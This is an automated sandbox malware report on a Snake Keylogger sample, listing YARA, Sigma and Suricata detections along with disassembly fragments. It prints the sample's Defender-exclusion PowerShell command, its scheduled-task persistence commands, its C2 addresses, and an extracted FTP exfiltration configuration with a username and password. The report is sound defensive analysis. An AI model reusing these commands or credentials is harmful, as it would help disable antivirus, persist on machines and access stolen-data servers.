17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x155de:$s1: UnHook 0x155e5:$s2: SetHook 0x155ed:$s3: CallNextHook 0x155fa:$s4: _hook
17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19997:$x1: $%SMTPDV$ 0x18378:$x2: $#TheHashHere%& 0x18324:$x3: %FTPDV$ 0x19a6d:$x4: $%TelegramDv$ 0x15c2e:$x5: KeyLoggerEventArgs 0x15fc3:$x5: KeyLoggerEventArgs 0x19963:$m2: Clipboard Logs ID 0x19bbd:$m2: Screenshot Logs ID 0x19ccd:$m2: keystroke Logs ID 0x19fa7:$m3: SnakePW 0x19b95:$m4: \SnakeKeylogger\
0.2.zam.exe.4137b30.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.zam.exe.4137b30.4.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.zam.exe.4137b30.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a26:$a1: get_encryptedPassword 0x35246:$a1: get_encryptedPassword 0x14d12:$a2: get_encryptedUsername 0x35532:$a2: get_encryptedUsername 0x14832:$a3: get_timePasswordChanged 0x35052:$a3: get_timePasswordChanged 0x1492d:$a4: get_passwordField 0x3514d:$a4: get_passwordField 0x14a3c:$a5: set_encryptedPassword 0x3525c:$a5: set_encryptedPassword 0x16060:$a7: get_logins 0x36880:$a7: get_logins 0x15fc3:$a10: KeyLoggerEventArgs 0x367e3:$a10: KeyLoggerEventArgs 0x15c2e:$a11: KeyLoggerEventArgsEventHandler 0x3644e:$a11: KeyLoggerEventArgsEventHandler
0.2.zam.exe.4137b30.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cbc1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b5d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bdf3:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba06:$a4: \Orbitum\User Data\Default\Login Data 0x3c226:$a4: \Orbitum\User Data\Default\Login Data 0x1ca45:$a5: \Kometa\User Data\Default\Login Data 0x3d265:$a5: \Kometa\User Data\Default\Login Data
0.2.zam.exe.4137b30.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x155de:$s1: UnHook 0x35dfe:$s1: UnHook 0x155e5:$s2: SetHook 0x35e05:$s2: SetHook 0x155ed:$s3: CallNextHook 0x35e0d:$s3: CallNextHook 0x155fa:$s4: _hook 0x35e1a:$s4: _hook
0.2.zam.exe.4137b30.4.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19997:$x1: $%SMTPDV$ 0x3a1b7:$x1: $%SMTPDV$ 0x18378:$x2: $#TheHashHere%& 0x38b98:$x2: $#TheHashHere%& 0x18324:$x3: %FTPDV$ 0x38b44:$x3: %FTPDV$ 0x19a6d:$x4: $%TelegramDv$ 0x3a28d:$x4: $%TelegramDv$ 0x15c2e:$x5: KeyLoggerEventArgs 0x15fc3:$x5: KeyLoggerEventArgs 0x3644e:$x5: KeyLoggerEventArgs 0x367e3:$x5: KeyLoggerEventArgs 0x19963:$m2: Clipboard Logs ID 0x19bbd:$m2: Screenshot Logs ID 0x19ccd:$m2: keystroke Logs ID 0x3a183:$m2: Clipboard Logs ID 0x3a3dd:$m2: Screenshot Logs ID 0x3a4ed:$m2: keystroke Logs ID 0x19fa7:$m3: SnakePW 0x3a7c7:$m3: SnakePW 0x19b95:$m4: \SnakeKeylogger\
0.2.zam.exe.4137b30.4.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
17.2.HaNkyQWPIIzrnC.exe.4b34598.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a26:$a1: get_encryptedPassword 0x35446:$a1: get_encryptedPassword 0x14d12:$a2: get_encryptedUsername 0x35732:$a2: get_encryptedUsername 0x14832:$a3: get_timePasswordChanged 0x35252:$a3: get_timePasswordChanged 0x1492d:$a4: get_passwordField 0x3534d:$a4: get_passwordField 0x14a3c:$a5: set_encryptedPassword 0x3545c:$a5: set_encryptedPassword 0x16060:$a7: get_logins 0x36a80:$a7: get_logins 0x15fc3:$a10: KeyLoggerEventArgs 0x369e3:$a10: KeyLoggerEventArgs 0x15c2e:$a11: KeyLoggerEventArgsEventHandler 0x3664e:$a11: KeyLoggerEventArgsEventHandler
17.2.HaNkyQWPIIzrnC.exe.4b34598.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x197d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c06:$a4: \Orbitum\User Data\Default\Login Data 0x1ac45:$a5: \Kometa\User Data\Default\Login Data
17.2.HaNkyQWPIIzrnC.exe.4b34598.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cdc1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b5d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bff3:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba06:$a4: \Orbitum\User Data\Default\Login Data 0x3c426:$a4: \Orbitum\User Data\Default\Login Data 0x1ca45:$a5: \Kometa\User Data\Default\Login Data 0x3d465:$a5: \Kometa\User Data\Default\Login Data
17.2.HaNkyQWPIIzrnC.exe.4b34598.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x155de:$s1: UnHook 0x35ffe:$s1: UnHook 0x155e5:$s2: SetHook 0x36005:$s2: SetHook 0x155ed:$s3: CallNextHook 0x3600d:$s3: CallNextHook 0x155fa:$s4: _hook 0x3601a:$s4: _hook
17.2.HaNkyQWPIIzrnC.exe.4b34598.4.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19997:$x1: $%SMTPDV$ 0x3a3b7:$x1: $%SMTPDV$ 0x18378:$x2: $#TheHashHere%& 0x38d98:$x2: $#TheHashHere%& 0x18324:$x3: %FTPDV$ 0x38d44:$x3: %FTPDV$ 0x19a6d:$x4: $%TelegramDv$ 0x3a48d:$x4: $%TelegramDv$ 0x15c2e:$x5: KeyLoggerEventArgs 0x15fc3:$x5: KeyLoggerEventArgs 0x3664e:$x5: KeyLoggerEventArgs 0x369e3:$x5: KeyLoggerEventArgs 0x19963:$m2: Clipboard Logs ID 0x19bbd:$m2: Screenshot Logs ID 0x19ccd:$m2: keystroke Logs ID 0x3a383:$m2: Clipboard Logs ID 0x3a5dd:$m2: Screenshot Logs ID 0x3a6ed:$m2: keystroke Logs ID 0x19fa7:$m3: SnakePW 0x3a9c7:$m3: SnakePW 0x19b95:$m4: \SnakeKeylogger\
0.2.zam.exe.4137b30.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c26:$a1: get_encryptedPassword 0x12f12:$a2: get_encryptedUsername 0x12a32:$a3: get_timePasswordChanged 0x12b2d:$a4: get_passwordField 0x12c3c:$a5: set_encryptedPassword 0x14260:$a7: get_logins 0x141c3:$a10: KeyLoggerEventArgs 0x13e2e:$a11: KeyLoggerEventArgsEventHandler
17.2.HaNkyQWPIIzrnC.exe.4b34598.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137de:$s1: UnHook 0x137e5:$s2: SetHook 0x137ed:$s3: CallNextHook 0x137fa:$s4: _hook
17.2.HaNkyQWPIIzrnC.exe.4b34598.4.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17b97:$x1: $%SMTPDV$ 0x16578:$x2: $#TheHashHere%& 0x16524:$x3: %FTPDV$ 0x17c6d:$x4: $%TelegramDv$ 0x13e2e:$x5: KeyLoggerEventArgs 0x141c3:$x5: KeyLoggerEventArgs 0x17b63:$m2: Clipboard Logs ID 0x17dbd:$m2: Screenshot Logs ID 0x17ecd:$m2: keystroke Logs ID 0x181a7:$m3: SnakePW 0x17d95:$m4: \SnakeKeylogger\
0.2.zam.exe.4137b30.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x197d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c06:$a4: \Orbitum\User Data\Default\Login Data 0x1ac45:$a5: \Kometa\User Data\Default\Login Data
0.2.zam.exe.4137b30.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137de:$s1: UnHook 0x137e5:$s2: SetHook 0x137ed:$s3: CallNextHook 0x137fa:$s4: _hook
0.2.zam.exe.4137b30.4.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17b97:$x1: $%SMTPDV$ 0x16578:$x2: $#TheHashHere%& 0x16524:$x3: %FTPDV$ 0x17c6d:$x4: $%TelegramDv$ 0x13e2e:$x5: KeyLoggerEventArgs 0x141c3:$x5: KeyLoggerEventArgs 0x17b63:$m2: Clipboard Logs ID 0x17dbd:$m2: Screenshot Logs ID 0x17ecd:$m2: keystroke Logs ID 0x181a7:$m3: SnakePW 0x17d95:$m4: \SnakeKeylogger\
Click to see the 51 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zam.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zam.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\zam.exe", ParentImage: C:\Users\user\Desktop\zam.exe, ParentProcessId: 7640, ParentProcessName: zam.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zam.exe", ProcessId: 7968, ProcessName: powershell.exe

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 158.101.44.242, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 5892, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49706

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmpA208.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmpA208.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe, ParentImage: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe, ParentProcessId: 4212, ParentProcessName: HaNkyQWPIIzrnC.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmpA208.tmp", ProcessId: 7692, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmp8F5A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmp8F5A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\zam.exe", ParentImage: C:\Users\user\Desktop\zam.exe, ParentProcessId: 7640, ParentProcessName: zam.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmp8F5A.tmp", ProcessId: 8072, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zam.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zam.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\zam.exe", ParentImage: C:\Users\user\Desktop\zam.exe, ParentProcessId: 7640, ParentProcessName: zam.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zam.exe", ProcessId: 7968, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmp8F5A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmp8F5A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\zam.exe", ParentImage: C:\Users\user\Desktop\zam.exe, ParentProcessId: 7640, ParentProcessName: zam.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmp8F5A.tmp", ProcessId: 8072, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T16:15:27.027738+0100	2803305	3	Unknown Traffic	192.168.2.10	49710	188.114.96.3	443	TCP
2024-11-08T16:15:28.443066+0100	2803305	3	Unknown Traffic	192.168.2.10	49715	188.114.96.3	443	TCP
2024-11-08T16:15:31.134845+0100	2803305	3	Unknown Traffic	192.168.2.10	49739	188.114.96.3	443	TCP
2024-11-08T16:15:33.579732+0100	2803305	3	Unknown Traffic	192.168.2.10	49753	188.114.96.3	443	TCP
2024-11-08T16:15:36.533636+0100	2803305	3	Unknown Traffic	192.168.2.10	49778	188.114.96.3	443	TCP
2024-11-08T16:15:37.586548+0100	2803305	3	Unknown Traffic	192.168.2.10	49786	188.114.96.3	443	TCP
2024-11-08T16:15:37.933564+0100	2803305	3	Unknown Traffic	192.168.2.10	49788	188.114.96.3	443	TCP
2024-11-08T16:15:39.033605+0100	2803305	3	Unknown Traffic	192.168.2.10	49800	188.114.96.3	443	TCP
2024-11-08T16:15:41.898974+0100	2803305	3	Unknown Traffic	192.168.2.10	49822	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T16:15:25.126913+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49706	158.101.44.242	80	TCP
2024-11-08T16:15:26.396184+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49706	158.101.44.242	80	TCP
2024-11-08T16:15:27.767343+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49711	158.101.44.242	80	TCP
2024-11-08T16:15:28.908175+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49719	158.101.44.242	80	TCP
2024-11-08T16:15:29.306360+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49720	158.101.44.242	80	TCP
2024-11-08T16:15:30.408169+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49719	158.101.44.242	80	TCP
2024-11-08T16:15:32.845663+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49742	158.101.44.242	80	TCP
2024-11-08T16:15:35.283168+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49759	158.101.44.242	80	TCP

ETPRO MALWARE SnakeKeylogger Exfil via FTP M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T16:15:16.595729+0100	2845532	1	Malware Command and Control Activity Detected	192.168.2.10	49833	50.31.176.103	21	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: zam.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe

Avira: detection malicious, Label: HEUR/AGEN.1309789

Found malware configuration

Source: 00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "FTP", "FTP Server": "ftp://50.31.176.103/", "FTP Username": "somac@gdmaduanas.com", "Password": "HW=f09RQ-BL1", "Version": "5.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe

ReversingLabs: Detection: 44%

Multi AV Scanner detection for submitted file

Source: zam.exe

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: zam.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: zam.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49707 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49726 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.10:49708 version: TLS 1.2

Source: zam.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0290FA39h	16_2_0290F778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0290E61Fh	16_2_0290E431
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0290EFA9h	16_2_0290E431
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	16_2_0290E005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	16_2_0290D7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	16_2_0290DE23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065A88EDh	16_2_065A85B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065A6119h	16_2_065A5E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	16_2_065A3676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065A5CC1h	16_2_065A5A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	16_2_065AFE02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065A6571h	16_2_065A62C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	16_2_065A3350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065A6E21h	16_2_065A6B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	16_2_065A3360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065A69C9h	16_2_065A6720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065A72A2h	16_2_065A6FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065A76F9h	16_2_065A7450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065A02E9h	16_2_065A0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065A0B99h	16_2_065A08F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065A0741h	16_2_065A0498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065A7B51h	16_2_065A78A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065A8401h	16_2_065A8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065A53E9h	16_2_065A5140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065A7FA9h	16_2_065A7D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 065A5869h	16_2_065A55C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 016BE61Fh	21_2_016BE431
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 016BEFA9h	21_2_016BE431
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 016BFA39h	21_2_016BF778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	21_2_016BE005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	21_2_016BD7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	21_2_016BDE23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056B1011h	21_2_056B0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056B15D8h	21_2_056B11C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056BBEB1h	21_2_056BBC08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056BD011h	21_2_056BCD68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056B0BB1h	21_2_056B0900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056B15D8h	21_2_056B1506
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056BCBB9h	21_2_056BC910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056BD469h	21_2_056BD1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056B15D8h	21_2_056B11B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056BC309h	21_2_056BC060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056B02F1h	21_2_056B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056BF2D1h	21_2_056BF028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056BFB81h	21_2_056BF8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056B0751h	21_2_056B04A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056BC761h	21_2_056BC4B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056BF729h	21_2_056BF480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056BEA21h	21_2_056BE778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056BB601h	21_2_056BB358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056BE5C9h	21_2_056BE320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056BB1A9h	21_2_056BAF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056BEE79h	21_2_056BEBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056BBA59h	21_2_056BB7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056BDD19h	21_2_056BDA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056BD8C1h	21_2_056BD618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 056BE171h	21_2_056BDEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06B46571h	21_2_06B462C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06B488EDh	21_2_06B485B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06B45CC1h	21_2_06B45A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06B46119h	21_2_06B45E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06B472A2h	21_2_06B46FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06B469C9h	21_2_06B46720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06B46E21h	21_2_06B46B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	21_2_06B43360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	21_2_06B43350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06B47B51h	21_2_06B478A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06B40741h	21_2_06B40498
